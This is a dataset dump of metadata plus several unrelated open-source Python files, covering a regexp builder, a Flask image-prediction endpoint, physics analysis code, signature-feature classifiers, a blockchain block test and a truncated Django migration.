blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a095a2b3730290cc131ea9a3074f0dee215ecd53 | 98c6ea9c884152e8340605a706efefbea6170be5 | /tests/still_torun/test_python_canonicalisation.py | 4a0f0c19de0dd8aad0684d76c27bf0bfb2b73ea9 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | from languages.python import PythonProgram
code = '''
print 'hello world'
class A:
def first_function(self, a):
a *= 2
if isinstance(a, int):
print 'This most definitely gets executed for sure'
return first_function
def second_function(b):
b = 2
for i in xrange(1000):
first_function(i)
b = 2
for i in xrange(1000):
first_function(i)
b = 2
for i in xrange(1000):
first_function(i)'''
expected='''print 's'
class A:
def f(i, i):
i *= 2
if i(i, i):
print 's'
return i
def f(i):
i = 2
for i in i(1000):
i(i)
i = 2
for i in i(1000):
i(i)
i = 2
for i in i(1000):
i(i)'''
program = PythonProgram(code, 'a.py')
assert program.get_canonicalised_program_source.strip() == expected.strip()
| [
"[email protected]"
] | |
5f32c80209f778fec002315adf1586ee30ef6794 | 5a8a0abdd12a767d2dc3a4f4b0f4102ac78e28fc | /lib/h8s/devices.py | 42f81df19eccccfc40447c062aa6d3de95721366 | [
"MIT"
] | permissive | enigmata/h8s-clp | 20fc19dae33acfd1eabd34a21a858bdf0dda6c04 | 4fa8a14bb80f0ac0fedc11d401412c15d2d033d7 | refs/heads/master | 2023-02-12T09:42:14.010522 | 2020-12-31T03:46:24 | 2020-12-31T03:46:24 | 290,272,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | import json
class DevicesIOError(Exception):
def __init__(self, msg):
self.data = msg
class Devices():
"""
A devices class is the generic representation of the set of devices that
is managed by a service.
Common attributes of device:
Name: Short identifier of the device
Type: Kind of device, using hierachical format where necessary
('<rootname>/<parentname>/...')
Room: Where the device is located in the house
Location: Where the device is located in the room
Active: Is the device in service
Properties: Attributes unique to the device type
NOTE: You do not instantiate the Devices class. A service will specialize
the Devices class, which is then embedded in this service object
"""
def __init__(self, service):
try:
f = open(os.path.join(os.path.dirname(sys.modules[service].__file__), 'devices.json'))
self.devices = json.load(f)
f.close()
except IOError:
self.devices = {}
raise DevicesIOError('Cannot read devices.json file')
def get_device(self):
for dev in self.devices:
yield self.devices[dev]
def get_devices(self):
return self.devices
| [
"[email protected]"
] | |
db5fd80ae9fc3d3766b0beb5d8bce724f622109a | 14a9667b31cdc846414c906a2e77153189e3feda | /builder.py | 1372a05601a85a6b650be96eea9055c79219eb8d | [] | no_license | gsnedders/py-regexp-builder | 298fdde86ed29aaf7e58f7cab376185a98c8d923 | 8ef65f2bb25f1d5ab701fd73aa4bf40abdcac2ca | refs/heads/master | 2023-05-27T00:44:51.469190 | 2013-04-15T21:05:48 | 2013-04-15T21:05:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,290 | py | import re
import sys
__all__ = ["builder", "enumerable_builder"]
def builder(ranges, **kwargs):
r"""Build a regexp from an iterable containing codepoints/ranges
builder takes an iterable containing either (or a mixture) of
codepoints (given either by a number type or as a unicode string) or
two-tuples of codepoints, where (x, y) represents a range from U+x to
U+y inclusive. There is an optional `force` argument, defaulting to None,
which can force "utf16"/"utf32" regexp generation (note, however, that
utf32 regexp generation requires a wide build of Python if characters
outside of the BMP are used.
For example:
>>> builder([0x61])
u'a'
>>> builder([(0x61, 0x7A)])
u'[a-z]'
>>> builder([(0x61, 0x7A), (0x41, 0x5A)])
u'[A-Za-z]'
>>> builder([(u"a", u"z"), (0x41, 0x5A)])
u'[A-Za-z]'
>>> builder([(u"a", 0x7A), (0x41, 0x5A)])
u'[A-Za-z]'
>>> builder([0x10000], force=None) # doctest: +SKIP
u'\U00010000' if sys.maxunicode == 0x10FFFF else u'\\\ud800\\\udc00'
>>> builder([0x10000], force="utf16")
u'\\\ud800\\\udc00'
>>> builder([0x10000], force="utf32") # doctest: +SKIP
u'\U00010000'
"""
ranges = _convertToRanges(ranges)
ranges = _mergeRanges(ranges)
return _generateRegexp(ranges, **kwargs)
def enumerable_builder(s, **kwargs):
r"""Build a regexp from an enumerable iterable based on truthfulness
`enumerable_builder` takes an iterable and enumerates it (through the
built-in enumerate(), hence requirements that places hold) treating
the nth value enumerated as U+n and allows it if the value is
truthful. There is an optional `force` argument, defaulting to None,
which can force "utf16"/"utf32" regexp generation (note, however, that
utf32 regexp generation requires a wide build of Python if characters
outside of the BMP are used.
For example:
>>> enumerable_builder([False, False, True])
u'\\\x02'
>>> enumerable_builder([True, True, True, True])
u'[\x00-\x03]'
"""
ranges = _inferRanges(s)
return _generateRegexp(ranges, **kwargs)
def _inferRanges(sequence):
"""Infer ranges from a sequence of boolean values.
The sequence is taken to represent U+n with its nth codepoint,
True where allowed and False where not.
>>> _inferRanges([])
[]
>>> _inferRanges([False])
[]
>>> _inferRanges([True])
[(0, 0)]
>>> _inferRanges([True, True, True])
[(0, 2)]
>>> _inferRanges([True, True, False])
[(0, 1)]
>>> _inferRanges([False, True, True])
[(1, 2)]
>>> _inferRanges([False, True, False])
[(1, 1)]
"""
ranges = []
start = None
for i, allow in enumerate(sequence):
if start is not None and not allow:
ranges.append((start, i - 1))
start = None
elif start is None and allow:
start = i
if start is not None:
ranges.append((start, i))
return ranges
def _convertToRanges(inputs):
r"""Convert the public ranges syntax to the internal one
>>> _convertToRanges([])
[]
>>> _convertToRanges([0])
[(0, 0)]
>>> _convertToRanges([0L])
[(0, 0)]
>>> _convertToRanges([u'a'])
[(97, 97)]
>>> _convertToRanges([(0x61, 0x7A)])
[(97, 122)]
>>> _convertToRanges([(u'a', 0x7A)])
[(97, 122)]
>>> _convertToRanges([(u'a', u'z')])
[(97, 122)]
>>> _convertToRanges([complex(0)])
Traceback (most recent call last):
TypeError: object of type 'complex' has no len()
"""
new = []
for input in inputs:
v = None
try:
v = _convertToCodepoint(input)
except (TypeError, ValueError):
if isinstance(input, unicode):
raise
if v is not None:
new.append((v, v))
elif len(input) == 2:
new.append((_convertToCodepoint(input[0]),
_convertToCodepoint(input[1])))
else:
raise ValueError("Each range must be of length two")
return new
def _convertToCodepoint(v):
"""Get a codepoint value from a string or int
>>> _convertToCodepoint(0)
0
>>> _convertToCodepoint(0x20)
32
>>> _convertToCodepoint(0x20L)
32
>>> _convertToCodepoint(u"\u0000")
0
>>> _convertToCodepoint(u"\u0020")
32
>>> _convertToCodepoint(u"\U0010FFFF")
1114111
>>> _convertToCodepoint(u"\uDBFF\uDFFF")
1114111
"""
if isinstance(v, unicode):
if len(v) == 1:
return ord(v[0])
elif len(v) == 2:
v0 = ord(v[0])
v1 = ord(v[1])
if (not 0xD800 <= v0 <= 0xDBFF or
not 0xDC00 <= v1 <= 0xDFFF):
raise ValueError("Two character string must be a surrogate pair")
return (((v0 & 0x03FF) << 10) | (v1 & 0x3FF)) + 0x10000
else:
raise ValueError("String must be a single character or surrogate pair")
else:
v = int(v)
if not (0 <= v <= 0x10FFFF):
raise ValueError("Integers must represent a Unicode codepoint, "
"%X is out of range!" % v)
return v
def _mergeRanges(ranges):
"""Merge overlapping/adjacent ranges
>>> _mergeRanges([])
[]
>>> _mergeRanges([(0,0)])
[(0, 0)]
>>> _mergeRanges([(0, 10), (20, 30)])
[(0, 10), (20, 30)]
>>> _mergeRanges([(0, 10), (10, 30)])
[(0, 30)]
>>> _mergeRanges([(0, 10), (9, 30)])
[(0, 30)]
>>> _mergeRanges([(0, 10), (11, 30)])
[(0, 30)]
>>> _mergeRanges([(10, 30), (0, 10)])
[(0, 30)]
>>> _mergeRanges([(0, 30), (10, 20)])
[(0, 30)]
"""
if not ranges:
return ranges
ranges = sorted(ranges, cmp=lambda a, b: cmp(a[0], b[0]))
newRanges = [list(ranges[0])]
for range in ranges[1:]:
prev = newRanges[-1]
if range[0] <= prev[1] + 1: # If we overlap or are adjacent
if range[1] > prev[1]: # If we're not a subset
prev[1] = range[1]
else:
newRanges.append(list(range))
return map(tuple, newRanges)
def _generateRegexp(ranges, force=None):
if (sys.maxunicode == 0xFFFF and force is None) or force == "utf16":
return _generateRegexpUTF16(ranges)
elif force is None or force == "utf32":
return _generateRegexpUTF32(ranges)
else:
raise ValueError
def _generateRegexpUTF32(ranges):
r"""Generate regexp for wide Python builds
>>> _generateRegexpUTF32([])
u''
>>> _generateRegexpUTF32([(0, 0)])
u'\\000'
>>> _generateRegexpUTF32([(0x28, 0x28)])
u'\\('
>>> _generateRegexpUTF32([(0x5b, 0x5b)])
u'\\['
>>> _generateRegexpUTF32([(0x61, 0x61)])
u'a'
>>> _generateRegexpUTF32([(0x61, 0x62)])
u'[ab]'
>>> _generateRegexpUTF32([(0x61, 0x63)])
u'[abc]'
>>> _generateRegexpUTF32([(0x61, 0x64)])
u'[a-d]'
>>> _generateRegexpUTF32([(0x41, 0x44), (0x61, 0x64)])
u'[A-Da-d]'
>>> _generateRegexpUTF32([(0xFFF0, 0x10010)])
u'[\ufff0-\U00010010]'
"""
if len(ranges) == 0:
return u""
elif len(ranges) == 1 and ranges[0][0] == ranges[0][1]:
return re.escape(unichr(ranges[0][0]))
else:
exp = [u"["]
for range in ranges:
escaped0 = _escapeForCharClass(unichr(range[0]))
if range[0] == range[1]:
exp.append(escaped0)
else:
if range[1] - range[0] >= 3:
escaped1 = _escapeForCharClass(unichr(range[1]))
exp.append(u"%s-%s" % (escaped0, escaped1))
else:
exp.extend([_escapeForCharClass(unichr(x))
for x in xrange(range[0], range[1] + 1)])
exp.append(u"]")
return u"".join(exp)
def _generateRegexpUTF16(ranges):
r"""Generate regexp for narrow Python builds
>>> _generateRegexpUTF16([])
u''
>>> _generateRegexpUTF16([(0, 0)])
u'\\000'
>>> _generateRegexpUTF16([(0x28, 0x28)])
u'\\('
>>> _generateRegexpUTF16([(0x5b, 0x5b)])
u'\\['
>>> _generateRegexpUTF16([(0x61, 0x61)])
u'a'
>>> _generateRegexpUTF16([(0x61, 0x62)])
u'[ab]'
>>> _generateRegexpUTF16([(0x61, 0x63)])
u'[abc]'
>>> _generateRegexpUTF16([(0x61, 0x64)])
u'[a-d]'
>>> _generateRegexpUTF16([(0x41, 0x44), (0x61, 0x64)])
u'[A-Da-d]'
>>> _generateRegexpUTF16([(0xFFF0, 0xFFFF)])
u'[\ufff0-\uffff]'
>>> _generateRegexpUTF16([(0xFFF0, 0x10010)])
u'(?:[\ufff0-\uffff]|\\\ud800[\udc00-\udc10])'
>>> _generateRegexpUTF16([(0x10000, 0x10000)])
u'\\\ud800\\\udc00'
>>> _generateRegexpUTF16([(0x10000, 0x10010)])
u'\\\ud800[\udc00-\udc10]'
>>> _generateRegexpUTF16([(0x10300, 0x104FF)])
u'(?:\\\ud800[\udf00-\udfff]|\\\ud801[\udc00-\udcff])'
>>> _generateRegexpUTF16([(0x10300, 0x108FF)])
u'(?:\\\ud800[\udf00-\udfff]|\\\ud801[\udc00-\udfff]|\\\ud802[\udc00-\udcff])'
>>> _generateRegexpUTF16([(0x10300, 0x10CFF)])
u'(?:\\\ud800[\udf00-\udfff]|[\ud801\ud802][\udc00-\udfff]|\\\ud803[\udc00-\udcff])'
>>> _generateRegexpUTF16([(0x10300, 0x110FF)])
u'(?:\\\ud800[\udf00-\udfff]|[\ud801\ud802\ud803][\udc00-\udfff]|\\\ud804[\udc00-\udcff])'
>>> _generateRegexpUTF16([(0x10000, 0x10FFFF)])
u'[\ud800-\udbff][\udc00-\udfff]'
"""
segments = []
bmp = []
nonbmp = []
for range in ranges:
if range[1] <= 0xFFFF:
bmp.append(range)
elif range[0] <= 0xFFFF:
bmp.append((range[0], 0xFFFF))
nonbmp.append((0x10000, range[1]))
else:
nonbmp.append(range)
if bmp:
segments.append(_generateRegexpUTF32(bmp))
for range in nonbmp:
starthigh, startlow = _toSurrogate(range[0])
endhigh, endlow = _toSurrogate(range[1])
midstart, midend = (starthigh + 1 if startlow != 0xDC00 else starthigh,
endhigh - 1 if endlow != 0xDFFF else endhigh)
if starthigh == endhigh:
segments.append(re.escape(unichr(starthigh)) +
_generateRegexpUTF32([(startlow, endlow)]))
else:
if starthigh != midstart:
segments.append(re.escape(unichr(starthigh)) +
_generateRegexpUTF32([(startlow, 0xDFFF)]))
if midstart <= midend:
segments.append(_generateRegexpUTF32([(midstart, midend)]) +
u"[\uDC00-\uDFFF]")
if endhigh != midend:
segments.append(re.escape(unichr(endhigh)) +
_generateRegexpUTF32([(0xDC00, endlow)]))
if len(segments) > 1:
return u"(?:%s)" % u"|".join(segments)
elif segments:
return segments[0]
else:
return u""
_charsNeedEscapeForCharClass = frozenset([
u"\\",
u"]",
u"-",
u"^"])
def _escapeForCharClass(char):
if char in _charsNeedEscapeForCharClass:
return u"\\" + char
else:
return char
def _toSurrogate(char):
assert 0xFFFF < char <= 0x10FFFF
char = char - 0x10000
return ((char >> 10) + 0xD800, (char & 0x3FF) + 0xDC00)
| [
"[email protected]"
] | |
ecf10d6c299852de4375edc6289f69a047edaf28 | aaf85f28d1c696ccd2859381c86830654b173e9b | /prediction_app.py | 065b4d91430021bb52b2b3ca1f8282897f572e05 | [] | no_license | MohamedArif20091999/Predicting-Lung-Disease | 997958094e8eef27219ea3da98b5542b2afbf3b9 | a6b675f3fdfa740dcbfae10b6268c0f1e7477b68 | refs/heads/master | 2021-01-04T17:43:35.822964 | 2020-08-17T07:13:54 | 2020-08-17T07:13:54 | 240,691,904 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import base64
import numpy as np
import io
from PIL import Image
import keras
from keras import backend as K
from keras.models import Sequential
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing.image import img_to_array
from flask import request
from flask import jsonify
from flask import Flask
app = Flask(__name__)
def get_model():
global model
model = load_model('modvgg.h5')
print(" * Model loaded!")
def preprocess_image(image, target_size):
if image.mode != "RGB":
image = image.convert("RGB")
image = image.resize(target_size)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image/=255
return image
print(" * Loading Keras model...")
get_model()
@app.route("/predict", methods=["POST"])
def predict():
message = request.get_json(force=True)
encoded = message['image']
decoded = base64.b64decode(encoded)
image = Image.open(io.BytesIO(decoded))
processed_image = preprocess_image(image, target_size=(224, 224))
prediction = model.predict(processed_image).tolist()
response = {
'prediction': {
'neg': prediction[0][1],
'pos': prediction[0][0]
}
}
return jsonify(response)
| [
"[email protected]"
] | |
34bc327a98ac4e6aa7676a9f6be58747cbbfb705 | b0b8d2d7c875733bff4cddc26a3a4aaa57befd45 | /config.py | 9b68e5105acf09eb9ac5da64a8750ca1af1a5173 | [
"MIT"
] | permissive | phcavelar/ganban | 45fe8c82ba3984543d325534022ee90de2d6ec65 | 95c19fbc94cabc90d052a9dd210e34fd31bf0bad | refs/heads/master | 2020-07-03T03:38:11.592861 | 2019-08-17T14:24:11 | 2019-08-17T14:24:11 | 201,772,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get("SECRET_KEY") or "you-will-never-guess"
SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL") or (
"sqlite:///" +
os.path.join( basedir, "graphkanban.db" )
)
SQLALCHEMY_TRACK_MODIFICATIONS = False
| [
"[email protected]"
] | |
e441d5ae8986892752ad0e39f2ad8c244be3ce10 | bf4e8251ba481bdc68a3dd3a605434b83a726c15 | /venv/Scripts/easy_install-3.7-script.py | a4cc65edde6e16ebd4f3f04c2d9866e116730b06 | [] | no_license | VinayNCLK/PythonSeleniumPrograms | 2e1715bd429651462a14dd31a7b2ba639df724d0 | 6038f469a2cbcf20b6dd410697ca1dae4ccb413b | refs/heads/master | 2020-07-05T02:10:51.688677 | 2019-08-15T07:07:18 | 2019-08-15T07:07:18 | 202,491,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | #!C:\Users\shekar\PycharmProjects\Selenium_July\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
0835ebeb7880f30c8e6d23af65dcc6f41436f923 | f74522d780406c92139e991c36a50b28a9d049eb | /python/modules/JetResSkim.py | 5a1ec0dc05eafeb762991743f25f8bb73488d41d | [] | no_license | mkilpatr/NanoSUSY-tools | cfe1e08742a051d5fd04adabc64add8a5829c32d | 177f65b2e1ad659ec7cab1c4af8c0fda82f48fab | refs/heads/master | 2022-01-14T07:40:40.009894 | 2020-08-13T19:15:47 | 2020-08-13T19:15:47 | 162,190,651 | 0 | 1 | null | 2022-06-09T13:41:36 | 2018-12-17T21:14:23 | Python | UTF-8 | Python | false | false | 4,479 | py | #!/usr/bin/env python
import os, sys
import ROOT
import math
import numpy as np
from array import array
ROOT.PyConfig.IgnoreCommandLineOptions = True
from importlib import import_module
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from PhysicsTools.NanoAODTools.postprocessing.tools import deltaPhi, deltaR, closest
from PhysicsTools.NanoAODTools.postprocessing.framework.treeReaderArrayTools import *
from rootpy.tree import Tree, TreeModel, IntCol, FloatArrayCol
class JetResSkim(Module):
def __init__(self, era):
self.era = era
def beginJob(self):
pass
def endjob(self):
pass
def beginFile(self,inputFile,outputFile,inputTree,wrappedOutputTree):
self.out = wrappedOutputTree
self.out.branch("weight" ,"F")
self.out.branch("genjetpt" ,"F")
self.out.branch("genjeteta" ,"F")
self.out.branch("recojetpt" ,"F")
self.out.branch("genjetrank" ,"I")
self.out.branch("flavor" ,"I")
self.out.branch("rechempt" ,"F")
self.out.branch("genhempt" ,"F")
def PassEventFilter(self, flags):
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/MissingETOptionalFiltersRun2#2016_data
passEventFilter = None
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2016 ~~~~~
if self.era == "2016":
## Common filters
passEventFilter = flags.goodVertices and flags.HBHENoiseFilter and \
flags.HBHENoiseIsoFilter and flags.EcalDeadCellTriggerPrimitiveFilter \
and flags.BadPFMuonFilter and flags.BadChargedCandidateFilter # Post 2016 ICHEP
# and flags.BadPFMuonSummer16Filter and # flags.BadChargedCandidateSummer16Filter
## Only data
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2017 ~~~~~
if self.era == "2017" or self.era == "2018":
## Common filters
passEventFilter = flags.goodVertices and flags.HBHENoiseFilter and \
flags.HBHENoiseIsoFilter and flags.EcalDeadCellTriggerPrimitiveFilter \
and flags.BadPFMuonFilter and flags.BadChargedCandidateFilter \
and flags.ecalBadCalibFilter ## Need to double check whether is outdated
## Only data
return passEventFilter
def PassJetID(self, jets):
# https://twiki.cern.ch/twiki/bin/view/CMS/JetID#Recommendations_for_13_TeV_2017
# For 2016, loose and tight ID is the same : https://twiki.cern.ch/twiki/bin/view/CMS/JetID13TeVRun2016
# For 2017, only tight ID available: https://twiki.cern.ch/twiki/bin/view/CMS/JetID13TeVRun2017
# Select jet pt > 30GeV, which is used in jet ID study:
# https://indico.cern.ch/event/592313/contributions/2398387/attachments/1384663/2106630/JetID_JMARmeeting_7_12_2016.pdf
jetIDs = [j.jetId & 0b010 for j in jets if j.pt > 30]
return (0 not in jetIDs)
def analyze(self, event):
jets = Collection(event, "Jet")
genjets = Collection(event, "GenJet")
flags = Object(event, "Flag")
weight = event.genWeight
eventNum = event.event
PassJetID = self.PassJetID(jets)
PassFilter = self.PassEventFilter(flags) and PassJetID
if PassFilter and PassJetID:
for gJ in xrange(len(genjets)):
gJet = genjets[gJ]
if gJet.pt < 20: continue
rJet = 0
for iR in xrange(len(jets)) :
if jets[iR].genJetIdx != gJ: continue
rJet = jets[iR]
break
self.out.fillBranch("weight", weight)
self.out.fillBranch("genjetpt", gJet.pt)
self.out.fillBranch("genjeteta", gJet.eta)
self.out.fillBranch("recojetpt", rJet.pt if rJet != 0 else 9.5)
self.out.fillBranch("genjetrank", min(gJ, 250))
self.out.fillBranch("flavor", gJet.partonFlavour)
if(gJet.eta > -2.8 and gJet.eta < -1.6 and gJet.phi >-1.37 and gJet.phi < -1.07):
self.out.fillBranch("genhempt", gJet.pt)
else:
self.out.fillBranch("genhempt", 0)
if rJet != 0:
if(rJet.eta > -2.8 and rJet.eta < -1.6 and rJet.phi >-1.37 and rJet.phi < -1.07):
self.out.fillBranch("rechempt",rJet.pt)
else:
self.out.fillBranch("rechempt", 0)
else:
self.out.fillBranch("rechempt", 0)
self.out.fill()
return True
| [
"[email protected]"
] | |
1b9059dbcb69917eee809907d67f618309696c29 | 5659d136b70206b0a6caba529803ff684db2b82b | /classifiers.py | ae55eb72e02d5402bcc15edc39e131b82fc23d0e | [
"MIT"
] | permissive | zhy0/sig-tsc | 8d13916a4cff19505c12dd6ff64d4acc7ce72954 | a9d01760233f0fbb25d53a73225e9ee7bf53e1b3 | refs/heads/master | 2023-09-01T16:47:43.098663 | 2019-07-10T12:20:00 | 2019-07-10T12:20:00 | 192,418,597 | 1 | 0 | MIT | 2023-08-14T21:48:31 | 2019-06-17T21:03:57 | Jupyter Notebook | UTF-8 | Python | false | false | 6,246 | py | import numpy as np
from iisignature import sig, logsig, prepare
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.preprocessing import StandardScaler, FunctionTransformer
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import cross_val_score
class SigFeatures(BaseEstimator, TransformerMixin):
def __init__(self, level=3):
self.level = level
def fit(self, X, y=None):
return self
def transform(self, X):
return np.array([sig(x, self.level) for x in X])
class LogSigFeatures(BaseEstimator, TransformerMixin):
def __init__(self, level=3, dim=2):
self.level = level
self.dim = dim
def fit(self, X, y=None):
return self
def transform(self, X):
prepared = prepare(self.dim, self.level)
return np.array([logsig(x, prepared) for x in X])
class Embedding(BaseEstimator, TransformerMixin):
def fit(self, X, y=None):
return self
def transform_instance(self, X):
raise NotImplementedError
def transform(self, X):
return [self.transform_instance(x) for x in X]
class LeadLag(Embedding):
def transform_instance(self, X):
lead = np.transpose([X, X]).flatten()[1:]
lag = np.transpose([X, X]).flatten()[0:-1]
return np.transpose([lead, lag])
class TimeIndexed(Embedding):
def __init__(self, init_time=0., total_time=1.):
self.init_time = init_time
self.total_time = total_time
def fit(self, X, y=None):
return self
def transform_instance(self, X):
t = np.linspace(self.init_time, self.init_time + 1, len(X))
return np.c_[t, X]
class TimeJoined(Embedding):
def transform_instance(self, X):
Y = X.transpose()
t = np.transpose([Y[0], Y[0]]).flatten()
Z = np.insert(np.transpose([Y[1], Y[1]]).flatten()[0:-1], 0,0)
return np.transpose([t,Z])
class FlatCOTE(VotingClassifier):
def __init__(self, estimators, cv=3, n_jobs=None, flatten_transform=True):
super().__init__(estimators, voting='soft', weights=None, n_jobs=n_jobs,
flatten_transform=flatten_transform)
self.cv = cv
def fit(self, X, y):
super().fit(X, y)
self.weights = [cross_val_score(clf, X, y, cv=self.cv).mean()
for clf in self.estimators_]
return self
def create_concatenator(clf, sig_type='logsig', level=3, dim=2):
if sig_type == 'logsig':
if not dim:
raise
sig_features = LogSigFeatures(level=level, dim=dim)
else:
sig_features = SigFeatures(level=level)
leadlag = Pipeline([
('leadlag', LeadLag()),
('signature', sig_features),
('scale', StandardScaler()),
])
timeindexed = Pipeline([
('timeind', TimeIndexed()),
('signature', sig_features),
('scale', StandardScaler()),
])
timejoined = Pipeline([
('timeind', TimeIndexed()),
('timejoin', TimeJoined()),
('signature', sig_features),
('scale', StandardScaler()),
])
partial_sum = lambda X : np.cumsum(X, axis=1)
ps_leadlag = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('leadlag', LeadLag()),
('signature', sig_features),
('scale', StandardScaler()),
])
ps_timeindexed = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('timeind', TimeIndexed()),
('signature', sig_features),
('scale', StandardScaler()),
])
ps_timejoined = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('timeind', TimeIndexed()),
('timejoin', TimeJoined()),
('signature', sig_features),
('scale', StandardScaler()),
])
union = FeatureUnion([
('leadlag', leadlag),
('timejoined', timejoined),
('timeindexed', timeindexed),
('ps_leadlag', ps_leadlag),
('ps_timejoined', ps_timejoined),
('ps_timeindexed', ps_timeindexed),
])
return Pipeline([
('union', union),
('classifier', clf)
])
def create_vote_clf(clf, level=3, voter=FlatCOTE, **vote_args):
leadlag = Pipeline([
('leadlag', LeadLag()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
timeindexed = Pipeline([
('timeind', TimeIndexed()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
timejoined = Pipeline([
('timeind', TimeIndexed()),
('timejoin', TimeJoined()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
partial_sum = lambda X : np.cumsum(X, axis=1)
ps_leadlag = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('leadlag', LeadLag()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
ps_timeindexed = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('timeind', TimeIndexed()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
ps_timejoined = Pipeline([
('partialsum', FunctionTransformer(partial_sum, validate=False)),
('timeind', TimeIndexed()),
('timejoin', TimeJoined()),
('signature', SigFeatures(level=level)),
('scale', StandardScaler()),
('classifier', clone(clf)),
])
vote = voter([
('leadlag', leadlag),
('timejoined', timejoined),
('timeindexed', timeindexed),
('ps_leadlag', ps_leadlag),
('ps_timejoined', ps_timejoined),
('ps_timeindexed', ps_timeindexed),
], **vote_args)
return vote
| [
"[email protected]"
] | |
c51fac35f4ea046bd92d852442d74a099b9695a8 | aa245f4e900ab0f27eee9b0fb2d7c9f7d4172269 | /tests/test_block.py | 2bf653c0f7587c82d81d0fcc518b8d98e334dd59 | [
"MIT"
] | permissive | Vetrovec/chainee | ed4edd4e92637b29fcf5ff0493de6f6983e66e98 | 3a1a300f86ad8aeb385d8de7f766dd035c039f04 | refs/heads/master | 2022-04-05T13:54:38.804711 | 2020-02-01T14:11:16 | 2020-02-01T14:11:16 | 235,657,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | from unittest import TestCase
from chainee.block import Block
class TestBlock(TestCase):
def setUp(self):
address = "c70f4891d2ce22b1f62492605c1d5c2fc1a8ef47"
timestamp = 1579861388
self.block = Block(0, "0" * 64, address, 0, timestamp, 0)
def test_hash(self):
self.assertEqual(
self.block.hash(),
"075869850a068c32c4e8aca47218c3a65fa3a0de83b529af335c56a3d3c5df62"
)
def test_serialize(self):
self.assertEqual(
self.block.serialize(False).hex(),
"000000000000000000000000000000000000000000000000000000000000000000000000c70f4891d2ce22b1f62492605c1d5c2fc1a8ef47a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a000000008cc52a5e00000000"
)
def test_deserialize(self):
serialized = self.block.serialize(False)
temp_block = Block.deserialize(serialized)
self.assertEqual(serialized, temp_block.serialize(False))
| [
"[email protected]"
] | |
d5dd79518c88daae27d17853642256525b0734a7 | b1a259bed1daeee5928031253b05e2b2b32f5e06 | /clash/project/migrations/0034_register_freezeflag.py | af075a0e020f1080fbb1cd63945ad22fd4fa3b05 | [] | no_license | meghadandapat/Clash-Round-1 | 8cb7ad566e8006e03fb72c2387df26bea94d4dfa | 249ebaaeb8f8fa40dd5d086aeac77defb89b366a | refs/heads/main | 2023-07-24T18:44:14.490307 | 2021-09-06T07:45:10 | 2021-09-06T07:45:10 | 376,589,654 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # Generated by Django 3.1 on 2021-01-16 13:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project', '0033_register_get_chance'),
]
operations = [
migrations.AddField(
model_name='register',
